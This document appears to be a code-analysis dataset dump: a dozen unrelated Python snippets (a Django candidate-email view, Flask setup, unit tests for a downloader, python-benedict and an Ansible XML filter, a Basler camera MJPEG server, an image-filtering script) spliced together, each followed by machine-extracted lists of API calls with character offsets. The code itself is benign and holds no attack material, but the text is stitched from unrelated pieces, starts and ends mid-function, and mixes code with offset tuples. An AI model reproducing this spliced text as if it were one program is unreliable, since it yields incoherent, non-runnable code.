if task is not None:
task.progress = round(progress_float)
task.save()
# If gone through everything and no errors
if len(email_errors) > 0:
error_msg = (
"An error occured during the sending of emails. "
+ "Candidate Email and Error Messages: "
+ str(email_errors)
+ " --- "
+ "Inform CompServ of the errors, and inform the candidates "
+ "to access their accounts by resetting their password "
+ 'using "Forget your password?" in the Login page. '
+ "All {} candidates added!".format(num_of_accounts)
)
return False, error_msg
else:
return True, "Successfully added {} candidates!".format(num_of_accounts)
|
[
"hknweb.utils.login_and_permission",
"threading.Thread",
"hknweb.candidate.constants.CandidateDTO",
"hknweb.thread.models.ThreadTask.objects.get",
"csv.DictReader",
"django.contrib.auth.models.User",
"hknweb.utils.get_rand_photo",
"django.contrib.auth.models.User.objects.filter",
"django.http.JsonResponse",
"hknweb.views.users.get_current_cand_semester",
"django.contrib.auth.models.BaseUserManager.make_random_password",
"time.sleep",
"hknweb.thread.models.ThreadTask",
"django.core.mail.EmailMultiAlternatives",
"django.http.Http404",
"hknweb.models.Profile.objects.get",
"django.shortcuts.render",
"django.contrib.auth.models.Group.objects.get"
] |
[((698, 735), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (718, 735), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((967, 1004), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (987, 1004), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((1997, 2034), 'hknweb.utils.login_and_permission', 'login_and_permission', (['"""auth.add_user"""'], {}), "('auth.add_user')\n", (2017, 2034), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((912, 963), 'django.shortcuts.render', 'render', (['request', '"""candidate/create_candidates.html"""'], {}), "(request, 'candidate/create_candidates.html')\n", (918, 963), False, 'from django.shortcuts import render\n'), ((1651, 1688), 'csv.DictReader', 'csv.DictReader', (['decoded_cand_csv_file'], {}), '(decoded_cand_csv_file)\n', (1665, 1688), False, 'import csv\n'), ((1932, 1993), 'django.http.JsonResponse', 'JsonResponse', (["{'success': True, 'id': task_id, 'message': ''}"], {}), "({'success': True, 'id': task_id, 'message': ''})\n", (1944, 1993), False, 'from django.http import Http404, JsonResponse\n'), ((2092, 2121), 'hknweb.thread.models.ThreadTask.objects.get', 'ThreadTask.objects.get', ([], {'pk': 'id'}), '(pk=id)\n', (2114, 2121), False, 'from hknweb.thread.models import ThreadTask\n'), ((2133, 2265), 'django.http.JsonResponse', 'JsonResponse', (["{'progress': task.progress, 'message': task.message, 'is_successful': task.\n is_successful, 'is_done': task.is_done}"], {}), "({'progress': task.progress, 'message': task.message,\n 'is_successful': task.is_successful, 'is_done': task.is_done})\n", (2145, 2265), False, 'from django.http import Http404, JsonResponse\n'), ((2629, 2641), 'hknweb.thread.models.ThreadTask', 'ThreadTask', ([], {}), '()\n', (2639, 2641), False, 'from hknweb.thread.models import ThreadTask\n'), ((2666, 2776), 'threading.Thread', 'threading.Thread', ([], {'target': 'threaded_add_cands_and_email', 'args': '[cand_csv, num_rows, website_login_link, task]'}), '(target=threaded_add_cands_and_email, args=[cand_csv,\n num_rows, website_login_link, task])\n', (2682, 2776), False, 'import threading\n'), ((5074, 5112), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'name': 'ATTR.CANDIDATE'}), '(name=ATTR.CANDIDATE)\n', (5091, 5112), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((5425, 5452), 'hknweb.views.users.get_current_cand_semester', 'get_current_cand_semester', ([], {}), '()\n', (5450, 5452), False, 'from hknweb.views.users import get_current_cand_semester\n'), ((1079, 1088), 'django.http.Http404', 'Http404', ([], {}), '()\n', (1086, 1088), False, 'from django.http import Http404, JsonResponse\n'), ((1194, 1295), 'django.http.JsonResponse', 'JsonResponse', (["{'success': False, 'id': -1, 'message':\n 'No file detected (can be internal error)'}"], {}), "({'success': False, 'id': -1, 'message':\n 'No file detected (can be internal error)'})\n", (1206, 1295), False, 'from django.http import Http404, JsonResponse\n'), ((1449, 1534), 'django.http.JsonResponse', 'JsonResponse', (["{'success': False, 'id': -1, 'message': 'Please input a csv file!'}"], {}), "({'success': False, 'id': -1, 'message':\n 'Please input a csv file!'})\n", (1461, 1534), False, 'from django.http import Http404, JsonResponse\n'), ((6326, 6412), 'django.contrib.auth.models.BaseUserManager.make_random_password', 'BaseUserManager.make_random_password', (['None'], {'length': 'DEFAULT_RANDOM_PASSWORD_LENGTH'}), '(None, length=\n DEFAULT_RANDOM_PASSWORD_LENGTH)\n', (6362, 6412), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((6626, 6688), 'django.contrib.auth.models.User', 'User', ([], {'username': 'candidatedto.username', 'email': 'candidatedto.email'}), '(username=candidatedto.username, email=candidatedto.email)\n', (6630, 6688), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((8061, 8095), 'hknweb.models.Profile.objects.get', 'Profile.objects.get', ([], {'user': 'new_cand'}), '(user=new_cand)\n', (8080, 8095), False, 'from hknweb.models import Profile\n'), ((5796, 5813), 'hknweb.candidate.constants.CandidateDTO', 'CandidateDTO', (['row'], {}), '(row)\n', (5808, 5813), False, 'from hknweb.candidate.constants import ATTR, CandidateDTO, DEFAULT_RANDOM_PASSWORD_LENGTH\n'), ((7956, 7970), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (7966, 7970), False, 'import time\n'), ((8867, 8955), 'django.core.mail.EmailMultiAlternatives', 'EmailMultiAlternatives', (['subject', 'subject', 'settings.NO_REPLY_EMAIL', '[new_cand.email]'], {}), '(subject, subject, settings.NO_REPLY_EMAIL, [new_cand\n .email])\n', (8889, 8955), False, 'from django.core.mail import EmailMultiAlternatives\n'), ((1719, 1756), 'csv.DictReader', 'csv.DictReader', (['decoded_cand_csv_file'], {}), '(decoded_cand_csv_file)\n', (1733, 1756), False, 'import csv\n'), ((8611, 8627), 'hknweb.utils.get_rand_photo', 'get_rand_photo', ([], {}), '()\n', (8625, 8627), False, 'from hknweb.utils import login_and_permission, get_rand_photo\n'), ((3515, 3560), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'email': 'candidatedto.email'}), '(email=candidatedto.email)\n', (3534, 3560), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n'), ((4296, 4347), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'candidatedto.username'}), '(username=candidatedto.username)\n', (4315, 4347), False, 'from django.contrib.auth.models import BaseUserManager, Group, User\n')]
|
import datetime
from flask import Flask, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from app.extensions.db import db
# from app.models import User
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
# user_manager = UserManager(app, db, User)
# login_manager = LoginManager()
# login_manager.login_view = 'home.login'
# login_manager.init_app(app)
# QRcode(app, mode="google")
# @login_manager.user_loader
# def load_user(user_id):
# return User.query.get(user_id)
#
# @login_manager.unauthorized_handler
# def handle_needs_login():
# return redirect(url_for('home.login', msg="You have to be logged in to access this page."))
@app.context_processor
def inject_today_date():
return {'current_date': datetime.date.today()}
|
[
"flask.Flask",
"app.extensions.db.db.init_app",
"datetime.date.today"
] |
[((170, 185), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (175, 185), False, 'from flask import Flask, redirect, url_for\n'), ((219, 235), 'app.extensions.db.db.init_app', 'db.init_app', (['app'], {}), '(app)\n', (230, 235), False, 'from app.extensions.db import db\n'), ((750, 771), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (769, 771), False, 'import datetime\n')]
|
from contextlib import closing
from downloader import AttachmentDownloader
import unittest
import shelve
import os.path
class TestOpportunityDownloader(unittest.TestCase):
def setUp(self):
self.test_data = {
'FA4626-14-R-0011': [
{
'desc': 'Solicitation',
'filename': 'Solicitation.doc',
'url': 'https://www.fbo.gov/utils/view?id=46b7d20b80ba577b5e4dd10b1561b247'
},
{
'desc': 'Attch 1 Specifications',
'filename': 'Attch_1_Specifications.zip',
'url': 'https://www.fbo.gov/utils/view?id=f08375882eee4900f88a748fb8a941c7'
},
{
'desc': 'Attch 2 Material Submittal',
'filename': 'Attch_2_Submittal_Schedule.pdf',
'url': 'https://www.fbo.gov/utils/view?id=6b5544a2b5f254ae1dcfaea41f155960'
}
],
'FA-FOO-BAR-BAZ': [
{
'desc': 'Attch 3 Schedule of Drawings',
'filename': 'Attch_3_Schedule_of_Drawings.pdf',
'url': 'https://www.fbo.gov/utils/view?id=9e6640c9840978099dbe08351d0802bf'
},
{
'desc': 'Attch 4 Drawings',
'filename': 'Attch_4_Drawings.zip',
'url': 'https://www.fbo.gov/utils/view?id=58e041568e210a73884254db1c069855'
},
{
'desc': 'Attch 5 Wage Determination',
'filename': 'Attch_5_Wage_Determination.docx',
'url': 'https://www.fbo.gov/utils/view?id=7301f9274d34ebbf3ec3ff8df04968e4'
},
{
'desc': 'Attch 6 Base Entry Policy',
'filename': 'Attch_6_Base_Entry_Policy_Letter.pdf',
'url': 'https://www.fbo.gov/utils/view?id=b4e13ed9cdeb5eec3822465565810457'
}
]
}
with closing(shelve.open('test_attach')) as db:
for key in self.test_data:
db[key] = self.test_data[key]
def test_constructs_solnbr_download_directory_name(self):
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
self.assertEqual(downloader.dir_for_solnbr('FA-FOO-BAR-BAZ'), 'py_test_dls/FA-FOO-BAR-BAZ')
def test_creates_solnbr_download_directory(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
dirpath = downloader.dir_for_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
self.assertTrue(os.path.isdir(dirpath))
# clean up
os.rmdir(dirpath)
self.assertFalse(os.path.isdir(dirpath))
def test_downloader_does_not_care_if_directory_already_exists(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
downloader.create_dir_by_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
# clean up
os.rmdir(downloader.dir_for_solnbr(solnbr))
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"downloader.AttachmentDownloader",
"shelve.open"
] |
[((3284, 3299), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3297, 3299), False, 'import unittest\n'), ((2307, 2370), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (2327, 2370), False, 'from downloader import AttachmentDownloader\n'), ((2581, 2644), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (2601, 2644), False, 'from downloader import AttachmentDownloader\n'), ((3018, 3081), 'downloader.AttachmentDownloader', 'AttachmentDownloader', ([], {'shelf': '"""test_attach"""', 'dl_dir': '"""py_test_dls"""'}), "(shelf='test_attach', dl_dir='py_test_dls')\n", (3038, 3081), False, 'from downloader import AttachmentDownloader\n'), ((2103, 2129), 'shelve.open', 'shelve.open', (['"""test_attach"""'], {}), "('test_attach')\n", (2114, 2129), False, 'import shelve\n')]
|
from statsAuxiliary.statsAuxiliary import StatsAuxiliary
from generalStatistics.generalMedian import general_median
from generalStatistics.generalMode import general_mode
from generalStatistics.generalMean import general_mean
class GeneralStatistics(StatsAuxiliary):
result = 0
def __init__(self):
super().__init__()
pass
def g_mean(self, a):
self.result = general_mean(a)
return self.result
def g_median(self, a):
self.result = general_median(a)
return self.result
def g_mode(self, a):
self.result = general_mode(a)
return self.result
|
[
"generalStatistics.generalMode.general_mode",
"generalStatistics.generalMedian.general_median",
"generalStatistics.generalMean.general_mean"
] |
[((397, 412), 'generalStatistics.generalMean.general_mean', 'general_mean', (['a'], {}), '(a)\n', (409, 412), False, 'from generalStatistics.generalMean import general_mean\n'), ((490, 507), 'generalStatistics.generalMedian.general_median', 'general_median', (['a'], {}), '(a)\n', (504, 507), False, 'from generalStatistics.generalMedian import general_median\n'), ((583, 598), 'generalStatistics.generalMode.general_mode', 'general_mode', (['a'], {}), '(a)\n', (595, 598), False, 'from generalStatistics.generalMode import general_mode\n')]
|
# -*- coding: utf-8 -*-
from django import forms
from django.contrib import admin
from django.utils.translation import gettext_lazy as _
from .models import Address
from .widgets import AddressWithMapWidget
class HasExceptionFilter(admin.SimpleListFilter):
title = _("exception")
parameter_name = "has_exception"
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
(0, _("No")),
)
def queryset(self, request, queryset):
if self.value() is not None:
ids = Address.objects.values_list("pk", flat=True)
if self.value() == "1":
return queryset.filter(pk__in=ids)
elif self.value() == "0":
return queryset.exclude(pk__in=ids)
return queryset
class AddressAdmin(admin.ModelAdmin):
list_display = ["address", "computed_address", "latitude", "longitude", "has_exception"]
list_filter = [HasExceptionFilter]
search_fields = ["address"]
class form(forms.ModelForm):
class Meta:
widgets = {"address": AddressWithMapWidget({"class": "vTextField"})}
|
[
"django.utils.translation.gettext_lazy"
] |
[((273, 287), 'django.utils.translation.gettext_lazy', '_', (['"""exception"""'], {}), "('exception')\n", (274, 287), True, 'from django.utils.translation import gettext_lazy as _\n'), ((404, 412), 'django.utils.translation.gettext_lazy', '_', (['"""Yes"""'], {}), "('Yes')\n", (405, 412), True, 'from django.utils.translation import gettext_lazy as _\n'), ((431, 438), 'django.utils.translation.gettext_lazy', '_', (['"""No"""'], {}), "('No')\n", (432, 438), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
from django.urls import path, include
urlpatterns = [
path('api/', include(('rachis.apps.authentication.urls'), namespace='auth')),
path('api/', include(('rachis.apps.resource.urls'), namespace='resources')),
]
|
[
"django.urls.include"
] |
[((94, 154), 'django.urls.include', 'include', (['"""rachis.apps.authentication.urls"""'], {'namespace': '"""auth"""'}), "('rachis.apps.authentication.urls', namespace='auth')\n", (101, 154), False, 'from django.urls import path, include\n'), ((176, 235), 'django.urls.include', 'include', (['"""rachis.apps.resource.urls"""'], {'namespace': '"""resources"""'}), "('rachis.apps.resource.urls', namespace='resources')\n", (183, 235), False, 'from django.urls import path, include\n')]
|
# -*- coding: utf-8 -*-
from benedict import benedict
import unittest
class benedict_casting_test_case(unittest.TestCase):
def test__getitem__(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b['b.c']
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_cast_dict_to_benedict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bb = benedict(b)
bbd = bb.dict()
self.assertTrue(isinstance(bbd, dict))
self.assertFalse(isinstance(bbd, benedict))
self.assertEqual(d, bbd)
self.assertTrue(d is bbd)
def test_cast_benedict_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
# d1 = dict(**b)
# print(d1)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_cast_benedict_kwargs_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
d = dict(**b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bd = b.dict()
self.assertTrue(isinstance(bd, dict))
self.assertFalse(isinstance(bd, benedict))
self.assertTrue(d == bd)
self.assertTrue(d is bd)
def test_get(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get_dict('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_list_item(self):
d = {
'a': 1,
'b': {
'c': [
{ 'd': 2, },
{ 'e': 3, },
{ 'f': 4, },
]
},
}
b = benedict(d)
c = b.get_list_item('b.c', 1)
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'][1])
self.assertFalse(c is d['b']['c'][1])
def test_pop(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.pop('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
with self.assertRaises(KeyError):
d['b']['c']
|
[
"benedict.benedict"
] |
[((319, 330), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (327, 330), False, 'from benedict import benedict\n'), ((733, 744), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (741, 744), False, 'from benedict import benedict\n'), ((758, 769), 'benedict.benedict', 'benedict', (['b'], {}), '(b)\n', (766, 769), False, 'from benedict import benedict\n'), ((1015, 1055), 'benedict.benedict', 'benedict', (["{'a': 1, 'b': {'c': {'d': 2}}}"], {}), "({'a': 1, 'b': {'c': {'d': 2}}})\n", (1023, 1055), False, 'from benedict import benedict\n'), ((1606, 1646), 'benedict.benedict', 'benedict', (["{'a': 1, 'b': {'c': {'d': 2}}}"], {}), "({'a': 1, 'b': {'c': {'d': 2}}})\n", (1614, 1646), False, 'from benedict import benedict\n'), ((2109, 2120), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2117, 2120), False, 'from benedict import benedict\n'), ((2491, 2502), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2499, 2502), False, 'from benedict import benedict\n'), ((2896, 2907), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2904, 2907), False, 'from benedict import benedict\n'), ((3381, 3392), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (3389, 3392), False, 'from benedict import benedict\n'), ((3800, 3811), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (3808, 3811), False, 'from benedict import benedict\n')]
|
import time
from typing import Any, Dict, List
from configs import GLOBAL_QUEUE_NAMES
from nxs_libs.queue import NxsQueueType
from nxs_libs.simple_key_value_db import NxsSimpleKeyValueDbType
from nxs_types.log import NxsBackendCmodelThroughputLog, NxsBackendThroughputLog
from nxs_types.nxs_args import NxsBackendMonitorArgs
from nxs_utils.nxs_helper import (
create_queue_puller_from_args,
create_queue_pusher_from_args,
create_simple_key_value_db_from_args,
)
class NxsBasicBackendMonitor:
def __init__(self, args: NxsBackendMonitorArgs) -> None:
self.args = args
self.model_expiration_secs = 30
self.logs_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.BACKEND_LOGS
)
self.logs_puller.set_buf_size(999)
self.kv_store = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
self.logs_dict: Dict[str, Any] = {}
self.logs_ts_dict: Dict[str, float] = {}
def _process_logs(self, logs: List[NxsBackendThroughputLog]):
ts = time.time()
keys_to_remove = []
for key in self.logs_dict:
if ts - self.logs_ts_dict[key] > self.model_expiration_secs:
keys_to_remove.append(key)
for key in keys_to_remove:
self.logs_dict.pop(key)
self.logs_ts_dict.pop(key)
for log in logs:
key = log.backend_name
self.logs_dict[key] = log
self.logs_ts_dict[key] = ts
def _get_stored_logs(self) -> List[NxsBackendThroughputLog]:
logs: List[NxsBackendThroughputLog] = []
for key in self.logs_dict:
logs.append(self.logs_dict[key])
return logs
def run(self):
while True:
logs: List[NxsBackendThroughputLog] = self.logs_puller.pull()
self._process_logs(logs)
self.kv_store.set_value(
GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS, self._get_stored_logs()
)
time.sleep(self.args.polling_interval_secs)
if __name__ == "__main__":
from main_processes.backend_monitor.args import parse_args
args = parse_args()
monitor = NxsBasicBackendMonitor(args)
monitor.run()
|
[
"nxs_utils.nxs_helper.create_simple_key_value_db_from_args",
"nxs_utils.nxs_helper.create_queue_puller_from_args",
"main_processes.backend_monitor.args.parse_args",
"time.sleep",
"time.time"
] |
[((2212, 2224), 'main_processes.backend_monitor.args.parse_args', 'parse_args', ([], {}), '()\n', (2222, 2224), False, 'from main_processes.backend_monitor.args import parse_args\n'), ((659, 752), 'nxs_utils.nxs_helper.create_queue_puller_from_args', 'create_queue_puller_from_args', (['args', 'NxsQueueType.REDIS', 'GLOBAL_QUEUE_NAMES.BACKEND_LOGS'], {}), '(args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.\n BACKEND_LOGS)\n', (688, 752), False, 'from nxs_utils.nxs_helper import create_queue_puller_from_args, create_queue_pusher_from_args, create_simple_key_value_db_from_args\n'), ((837, 910), 'nxs_utils.nxs_helper.create_simple_key_value_db_from_args', 'create_simple_key_value_db_from_args', (['args', 'NxsSimpleKeyValueDbType.REDIS'], {}), '(args, NxsSimpleKeyValueDbType.REDIS)\n', (873, 910), False, 'from nxs_utils.nxs_helper import create_queue_puller_from_args, create_queue_pusher_from_args, create_simple_key_value_db_from_args\n'), ((1107, 1118), 'time.time', 'time.time', ([], {}), '()\n', (1116, 1118), False, 'import time\n'), ((2064, 2107), 'time.sleep', 'time.sleep', (['self.args.polling_interval_secs'], {}), '(self.args.polling_interval_secs)\n', (2074, 2107), False, 'import time\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import unittest
from ansible.errors import AnsibleError
from ansible.errors import AnsibleFilterError
from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml
INVALID_DATA = '<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
VALID_DATA = (
'<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
"<schemas><schema/></schemas></netconf-state>"
)
OUTPUT = """{"netconf-state": \
{"@xmlns": "urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring", "schemas": {"schema": null}}}"""
class TestFromXml(unittest.TestCase):
def setUp(self):
pass
def test_invalid_data(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "xmltodict"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn(
"Error when using plugin 'from_xml': Input Xml is not valid",
str(error.exception),
)
def test_valid_data(self):
"""Check passing valid data as per criteria"""
self.maxDiff = None
args = ["", VALID_DATA, "xmltodict"]
result = _from_xml(*args)
self.assertEqual(result, OUTPUT)
def test_args(self):
"""Check passing invalid argspec"""
# missing required arguments
args = []
kwargs = {}
with self.assertRaises(AnsibleFilterError) as error:
_from_xml(*args, **kwargs)
self.assertIn("missing required arguments: data", str(error.exception))
def test_invalid_engine(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "test"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn("engine: test is not supported", str(error.exception))
|
[
"ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml"
] |
[((1461, 1477), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args)\n', (1470, 1477), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((1116, 1142), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (1125, 1142), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((1738, 1764), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (1747, 1764), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((2092, 2118), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (2101, 2118), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n')]
|
import io
import json
import os
import sys
from http.server import ThreadingHTTPServer
from mjpegserver import StreamingHandler
from threading import Condition
from threading import Thread
import basler
from utility import ePrint
"""
FrameBuffer is a synchronized buffer which gets each frame and notifies to all waiting clients.
It implements write() method to be used
"""
class FrameBuffer:
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
# New frame
with self.condition:
# write to buffer
self.buffer.seek(0)
self.buffer.write(buf)
# crop buffer to exact size
self.buffer.truncate()
# save the frame
self.frame = self.buffer.getvalue()
# notify all other threads
self.condition.notify_all()
def main():
try:
ePrint(sys.argv)
camera_id = sys.argv[1]
port = int(sys.argv[2])
ePrint("Starting MJPEG Server for camera ID: %s @port %s" % (camera_id, port))
script_path = os.path.dirname(os.path.realpath(__file__))
config_path = script_path+'/'+'config.json'
config_file = open(config_path, "r")
config = json.load(config_file)
config_file.close()
# Create frame_buffer for image data sharing
frame_buffer = FrameBuffer()
# Start camera image grabbing
camera = basler.Basler(config[camera_id], camera_id, frame_buffer)
# Start camera command handler
thread1 = Thread(target=camera.cameraCommandHandler)
thread1.start()
# Start Datastreamer to StdOut
if config[camera_id]["converter"]["OutPutToStdOut"]:
from utility import DataStreamer
streamer = DataStreamer(frame_buffer)
thread2 = Thread(target=streamer.writeToStdout)
thread2.start()
# Start MJPEG server
address = ('', port)
httpd = ThreadingHTTPServer(address, lambda *args: StreamingHandler(frame_buffer, camera_id, *args))
httpd.serve_forever()
finally:
camera.stopGrabbingImages()
thread1.join()
if config["converter"]["OutPutToStdOut"]:
thread2.join()
ePrint("Threads finished...exiting")
ePrint("Program finished")
if __name__ == '__main__':
main()
|
[
"threading.Thread",
"io.BytesIO",
"json.load",
"os.path.realpath",
"threading.Condition",
"mjpegserver.StreamingHandler",
"utility.DataStreamer",
"utility.ePrint",
"basler.Basler"
] |
[((468, 480), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (478, 480), False, 'import io\n'), ((506, 517), 'threading.Condition', 'Condition', ([], {}), '()\n', (515, 517), False, 'from threading import Condition\n'), ((953, 969), 'utility.ePrint', 'ePrint', (['sys.argv'], {}), '(sys.argv)\n', (959, 969), False, 'from utility import ePrint\n'), ((1042, 1120), 'utility.ePrint', 'ePrint', (["('Starting MJPEG Server for camera ID: %s @port %s' % (camera_id, port))"], {}), "('Starting MJPEG Server for camera ID: %s @port %s' % (camera_id, port))\n", (1048, 1120), False, 'from utility import ePrint\n'), ((1302, 1324), 'json.load', 'json.load', (['config_file'], {}), '(config_file)\n', (1311, 1324), False, 'import json\n'), ((1500, 1557), 'basler.Basler', 'basler.Basler', (['config[camera_id]', 'camera_id', 'frame_buffer'], {}), '(config[camera_id], camera_id, frame_buffer)\n', (1513, 1557), False, 'import basler\n'), ((1616, 1658), 'threading.Thread', 'Thread', ([], {'target': 'camera.cameraCommandHandler'}), '(target=camera.cameraCommandHandler)\n', (1622, 1658), False, 'from threading import Thread\n'), ((2322, 2358), 'utility.ePrint', 'ePrint', (['"""Threads finished...exiting"""'], {}), "('Threads finished...exiting')\n", (2328, 2358), False, 'from utility import ePrint\n'), ((2367, 2393), 'utility.ePrint', 'ePrint', (['"""Program finished"""'], {}), "('Program finished')\n", (2373, 2393), False, 'from utility import ePrint\n'), ((1159, 1185), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1175, 1185), False, 'import os\n'), ((1852, 1878), 'utility.DataStreamer', 'DataStreamer', (['frame_buffer'], {}), '(frame_buffer)\n', (1864, 1878), False, 'from utility import DataStreamer\n'), ((1901, 1938), 'threading.Thread', 'Thread', ([], {'target': 'streamer.writeToStdout'}), '(target=streamer.writeToStdout)\n', (1907, 1938), False, 'from threading import Thread\n'), ((2085, 2133), 'mjpegserver.StreamingHandler', 'StreamingHandler', (['frame_buffer', 'camera_id', '*args'], {}), '(frame_buffer, camera_id, *args)\n', (2101, 2133), False, 'from mjpegserver import StreamingHandler\n')]
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: <NAME>
# Contact: <EMAIL>
# Git: www.github.com/italogfernandes
# This project is based on: https://github.com/ronaldosena/imagens-medicas-2
# Please give the credits to ronaldo sena.
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# ------------------------------------------------------------------------------
from scipy.misc import imread
import matplotlib.image as mpimg
import scipy.ndimage as ndimage
from matlab_fspecial import fspecial
# First part
files_folder = '../../datasets/' # Caminho para a pasta onde estao as imagens
file_names = ('arteriaBMP.bmp','blood0.PNG','blood1.PNG','pe.jpg')
in_images = [imread(files_folder+image_name) for image_name in file_names ]
out_images = [None] * len(file_names)
brightness = 100
mask_sizes = (3,7,25)
kernels = []
for mask_size in mask_sizes:
kernels.append(fspecial('average',mask_size))
# for in_image in in_images:
for i in range(len(file_names)):
in_image = in_images[i]
o1 = in_image + brightness
o1[in_image > (255 - brightness)] = 255
o2 = in_image - brightness
